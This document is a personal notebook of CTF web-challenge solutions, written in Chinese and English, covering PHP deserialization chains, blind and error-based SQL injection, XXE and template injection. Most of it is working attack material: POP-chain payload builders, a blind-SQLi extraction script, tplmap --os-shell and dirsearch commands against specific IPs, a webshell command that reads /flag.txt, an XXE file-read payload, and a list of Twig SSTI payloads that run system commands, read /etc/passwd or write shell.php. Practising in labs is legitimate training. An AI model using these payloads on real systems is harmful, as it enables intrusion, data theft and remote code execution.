

[MRCTF2020]Ezpop

show->__wakeup->show->__tostring->test->__get->modifier->__invoke

<?php
// Local stand-in for the challenge's Modifier class, declared only so that
// serialize() below emits an object with the same class name, property name
// and visibility as the application's real class (the chain listed above the
// code relies on its __invoke, which is not needed here to build the string).
class Modifier {
    // Payload carried by the object; here a php://filter wrapper path.
    // Being protected, it serializes with a "\0*\0" prefix, which is one
    // reason the final output is urlencode()d rather than printed raw.
    protected $var;
    public function __construct($a)
    {
        $this->var=$a;
    }
}
// Stand-in for the challenge's Show class: two public properties, declared in
// the same order as the original so the serialized form matches.
class Show{
    public $source; // outer Show: holds the inner Show; inner Show: plain string
    public $str;    // inner Show: holds the Test object
}
// Stand-in for the challenge's Test class; its __get is the link in the chain
// (see the sequence above), so only the property name matters here.
class Test{
    public $p; // holds the Modifier
}
// Assemble the chain from the inside out: Modifier carries the wrapper path,
// Test wraps it in ->p, an inner Show wraps that in ->str, and an outer Show
// carries the inner one as ->source. Output is URL-encoded so the null bytes
// from the protected property survive transport as a query parameter.
$modifier = new Modifier('php://filter/read=convert.base64-encode/resource=flag.php');
$test = new Test();
$test->p = $modifier;
$inner = new Show();
$inner->str = $test;
$inner->source = 'hhh';
$outer = new Show();
$outer->source = $inner;
echo urlencode(serialize($outer));

[NPUCTF2020]ReadlezPHP

flag在env里,phpinfo中system禁了,但eval没禁,不知道为啥用不了。

<?php
// Stand-in for the challenge's HelloPhp class: only the class name and the two
// public property names need to match the application's class for the
// serialized string to be accepted on unserialize().
class HelloPhp
{
    public $a; // argument string handed to the callable in $b
    public $b; // name of the callable invoked on $a
}
// Build the object with the expression in ->a and the callable name in ->b,
// then emit it URL-encoded. The note above the listing explains why assert is
// used here rather than system.
$obj = new HelloPhp();
$obj->a = 'phpinfo()';
$obj->b = 'assert';
echo urlencode(serialize($obj));

[极客大挑战 2019]FinalSQL

布尔盲注

import requests

# Endpoint of the challenge instance; the host name is specific to one deployment.
url = "http://9e509658-ff70-4552-a198-b2dcb080c0c8.node4.buuoj.cn:81/search.php"
# Accumulates the recovered string; exp() appends one character per position.
flag: str = ''

def payload(i, j):
    """Boolean oracle for one (position, threshold) probe.

    Submits the query template with position ``i`` and threshold ``j`` as
    the ``id`` parameter of the module-level ``url`` and maps the page's
    two response shapes to an int: 1 when the "Click" marker is present
    (the predicate held), 0 otherwise. Purely network-bound; the return
    value is the only observable result.
    """
    # Earlier rounds of the same probe, kept for the record:
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, j)
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1" % (i, j) F1naI1y,Flaaaaag
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),%d,1))>%d)^1" % (i, j) id,fl4gawsl
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),%d,1))>%d)^1" % (i, j) id,username,password
    sql = "1^(ord(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    r = requests.get(url, params={"id": sql})
    # print (r.url)
    return 1 if "Click" in r.text else 0


def exp():
    """Recover the target string one character at a time into the global ``flag``.

    For each position, binary-searches the byte value in [31, 127] using
    ``payload`` as a "greater than" oracle, prints progress as it goes, and
    stops at the first position whose search lands on either boundary of
    the range (taken to mean there is nothing left to read).
    """
    global flag
    for pos in range(1, 10000):
        print(pos, ':')
        lo, hi = 31, 127
        # Classic bisection: a truthy oracle means ord(char) > mid.
        while lo <= hi:
            mid = (lo + hi) // 2
            if payload(pos, mid):
                lo = mid + 1
            else:
                hi = mid - 1
        value = (lo + hi + 1) // 2
        # Landing on an endpoint of the search range ends the extraction.
        if value in (31, 127):
            break
        flag += chr(value)
        print(flag)


# Run the extraction, then print whatever was accumulated in the global.
exp()
print('flag=', flag)

最近身体出了点状况,没时间也没精力刷了,先勉强做几个


[De1CTF 2019]SSRF Me

JUST DO IT

xk0SzyKwfzw.php?Efa5BVG=cat /flag.txt

先本地测试,找到马后直接利用即可

import os
import requests
import re
import threading
import time
print('开始时间: '+ time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100) # caps how many worker threads run at once
filePath = r"D:\phpstudy_pro\WWW\src" # local copy of the site's source
os.chdir(filePath) # so each file can later be opened by bare name
requests.adapters.DEFAULT_RETRIES = 5 # reconnect attempts, meant to survive dropped connections under many threads
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False # intended to turn keep-alive off
# NOTE(review): Session has no keep_alive attribute, so the line above only
# sets a plain Python attribute — confirm it actually changes connection reuse.
def get_content(file):
    """Probe one PHP file of the local site copy for a parameter that reaches eval.

    Reads the file, collects every $_GET['x'] / $_POST['x'] name it references,
    sends a single request to http://127.0.0.1/<file> with all of them set to
    ``echo 'hdh';``, and, when the marker comes back, re-probes one parameter
    at a time to identify which one. Findings are only printed. The body runs
    under the module-level semaphore ``s1``.
    """
    s1.acquire()
    print('trying '+file+ ' '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f: # open the php file and collect every $_GET / $_POST parameter name
        gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
        # NOTE(review): this second f.read() runs on an already-consumed file
        # object and returns '', so `posts` is always empty here.
        posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {} # all $_POST parameters
    params = {} # all $_GET parameters
    for m in gets:
        params[m] = "echo 'hdh';"
    for n in posts:
        data[n] = "echo 'hdh';"
    url = 'http://127.0.0.1/'+file
    req = session.post(url, data=data, params=params) # one request carrying every GET and POST parameter
    req.close() # close the response to free the connection
    req.encoding = 'utf-8'
    content = req.text
    # print(content)
    # os.system('pause')
    if "hdh" in content: # some parameter echoed the marker; narrow down which one
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'hdh';")
            content = req.text
            req.close() # close the response to free the connection
            if "hdh" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'hdh';"})
                content = req.text
                req.close() # close the response to free the connection
                if "hdh" in content:
                    break
        if flag == 1: # flag tells GET from POST: 1 means a GET hit (b is unbound); 0 means the POST loop ran
            param = a
        else:
            param = b
        # `a` / `b` are the leftover loop variables; if the corresponding loop
        # never ran (empty list) the name is unbound and the line above raises.
        fuck=file # unused
        bage=param # unused
        print('找到了利用文件: '+file+" and 找到了利用的参数:%s" %param)
    print('结束时间: ' + time.asctime(time.localtime(time.time())))
    # NOTE(review): there is no try/finally around the body, so an exception
    # (unreadable file, failed request) skips this release and the semaphore
    # slot is lost for the rest of the run.
    s1.release()

# One worker thread per file; concurrency is bounded by the semaphore inside get_content.
for name in files:
    threading.Thread(target=get_content, args=(name,)).start()

my upload

python3 dirsearch.py -u http://202.119.201.213:54334/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429

python3 .\dirsearch.py -u http://202.119.201.213:52980/ -e *

myflask

有点意外,直接tplmap可以拿到shell

python2 tplmap.py -u http://202.119.201.213:56276/loged?name --os-shell

签到

import base64
with open('1.txt', 'r') as fh:
    blob = fh.read()
# Strip 30 layers of base64, one per pass; the text is re-decoded as UTF-8 each time.
for _ in range(30):
    blob = base64.b64decode(blob).decode('utf-8')
print(blob)

Easy_Base

import base64
with open ('flag.txt','r') as f:
s = f.read()
s=base64.b16decode(s).decode('utf-8')
s=base64.b32decode(s).decode('utf-8')
s=base64.b64decode(s).decode('utf-8')
print(s)

[安洵杯 2019]easy_serialize_php

好难的题,用了2个小时,反序列化逃逸,上一次做还是在选拔赛上

d0g3_f1ag.php

一些草稿
_SESSION[phpflag]=s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

"a:2:{s:7:"phpflag";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s}

"a:2:{s:7:"";hhhhh";s:1:"1";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s}

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
此时session数组
phpflag ==> ;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
img ==> 无效路径
序列化为
"a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s:img:xxxxxxxxxxxxxxxxxxxxxxxxxx}"
过滤后
"a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s:img:xxxxxxxxxxxxxxxxxxxxxxxxxx}" 逃逸成功
反序列化,此时session数组
";s:48: ==> 1
img ==> L2QwZzNfZmxsbGxsbGFn

[CISCN 2019 初赛]Love Math

[NCTF2019]Fake XML cookbook

<!-- XXE probe: the inline DTD declares an external entity backed by a local
     file, and the parser expands it wherever &xxe; appears (here inside
     <username>, presumably reflected in the response). A parser configured
     with external entity / DTD processing disabled leaves the reference
     unexpanded, which is the standard mitigation. -->
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///flag" >]>
<user>
<username>
&xxe;
</username>
<password>
123
</password>
</user>

php模板注入

https://www.cnblogs.com/bmjoker/p/13508538.html

TWIG

{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.enableDebug()}}{{_self.env.isDebug()}}

{{["id"]|map("system")|join(",")

{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}

{{["id",0]|sort("system")|join(",")}}

{{["id"]|filter("system")|join(",")}}

{{[0,0]|reduce("system","id")|join(",")}}

{{['cat /etc/passwd']|filter('system')}}

[ASIS 2019]Unicorn shop

传一个表示大数的unicode字符

https://www.compart.com/en/unicode/U+2187

我用的ↇ

[WUSTCTF2020]朴实无华

先charset改成utf-8编码

扫目录robots.txt

访问fl4g.php

payload

num=1e10
&md5=0e215962017
&get_flag=tac$IFS$1fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

5.6版本php可以绕过,7.1的不行

// Numeric gate from the challenge source. intval($num) parses the raw string,
// while intval($num + 1) coerces it through arithmetic first; for exponent
// notation such as 1e10 the two disagree on PHP < 7.1 (the string parse stops
// at 'e'), which is why the contradictory bounds can both hold there and not
// on 7.1, as the note above the listing records. Deriving both comparisons
// from a single canonical numeric value closes the gap.
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

md5(0e215962017)正好也是0e开头,弱比较绕过

${IFS} $IFS$1都可以绕过空格

[极客大挑战 2019]HardSQL

先fuzz,过滤了空格

admin' #

updatexml注入

查库
admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

查表
admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

查列
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

查数据
admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1)where(id)like('1')),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)where(id)like('1')),0x7e),1))#

flag{7e570192-d6e8-4d02-aa0b-d1b684f7ae53}